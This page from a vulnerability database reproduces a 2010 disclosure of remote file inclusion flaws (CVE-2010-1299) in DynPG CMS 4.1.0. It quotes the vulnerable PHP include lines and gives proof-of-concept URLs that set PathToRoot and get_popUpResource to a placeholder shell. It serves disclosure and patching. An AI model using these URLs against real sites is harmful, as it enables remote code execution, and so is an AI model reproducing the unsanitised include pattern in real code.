DynPG CMS v4.1.0 Multiple Remote File Inclusion Vulnerability

2010.04.10
Credit: eidelweiss
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2010-1299
CWE: CWE-94


CVSS Base Score: 5.1/10
Impact Subscore: 6.4/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Dear, I found Some vulnerability in DynPG CMS , This the full exploit code: [+]Title : DynPG CMS Multiple Remote File Inclusion Vulnerability [+]Version: 4.1.0 (Other or lower versions may also be affected) [+]Download: http://www.dynpg.org/download_en.php [+]License: GNU / GPL [+]Metode : Remote File Inclusion [+]Author: eidelweiss [*]Special to Syabilla_putri (I miss u so much to)[*] [!]Thank`s Fly To: [~] Jose Luis Gongora Fernandez a.k.a JosS [~] exploit-db team (loneferret - Exploits - dookie2000ca) [~] r0073r & 0x1D , [D]eal [C]yber ######################################################## Description: DynPG is used to upload and manage dynamic web content similar to other content management systems. DynPG however differs from other CMS, because it is embedded directly into websites. The software was originally developed to realize designs that are created with Adobe Photoshop, Adobe Fireworks, Adobe Illustrator or any other graphics software. The layout is created with an editor like Adobe Dreamweaver or Adobe GoLive or even as simple code. After that, code snippets are placed at those points, where dynamically generated content (like articles, galleries, blogs or other dynamic content) shall be generated. It provides a convenient way to extend existing websites with dynamic content. DynPG provides a template engine, but also supports existing CSS layouts. ######################################################## -=[ Vuln C0de ]=- [!] counter.php require_once $GLOBALS["DefineRootToTool"]."config.php"; // line 15 require_once $GLOBALS["DefineRootToTool"]."connectdb.php"; // line 16 [!] /plugins/DPGguestbook/guestbookaction.php <?php function dynPG_Guestbook_proceedREQ() { require_once $GLOBALS['DynPG']->PathToRoot .'config.php'; require_once $GLOBALS['DynPG']->PathToRoot .'defines.php'; require_once $GLOBALS['DynPG']->PathToRoot .'connectdb.php'; [!] /backendpopup/popup.php require './resources/' . $get_popUpResource . '/index.res.php'; // line 36 [!] etc , etc , etc -=[ Proof Of Concept ]=- http://127.0.0.1/DynPG_path/plugins/DPGguestbook/guestbookaction.php?Pat hToRoot= [inject0r sh3ll] http://127.0.0.1/DynPG_path/backendpopup/popup.php?get_popUpResource= [inj3ct0r sh3ll] etc , etc , etc ######################=[E0F]=#############################

References:

http://www.securityfocus.com/bid/39168
http://www.securityfocus.com/archive/1/archive/1/510477/100/0/threaded
http://www.exploit-db.com/exploits/11994
http://www.dynpg.org/cms-freeware.php?t=DynPG-Update+4.1.1+noch+einfacher+und+sicherer%21&read_article=169
http://secunia.com/advisories/39185
http://packetstormsecurity.org/1004-exploits/dynpgcms-rfi.txt
http://osvdb.org/63415


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top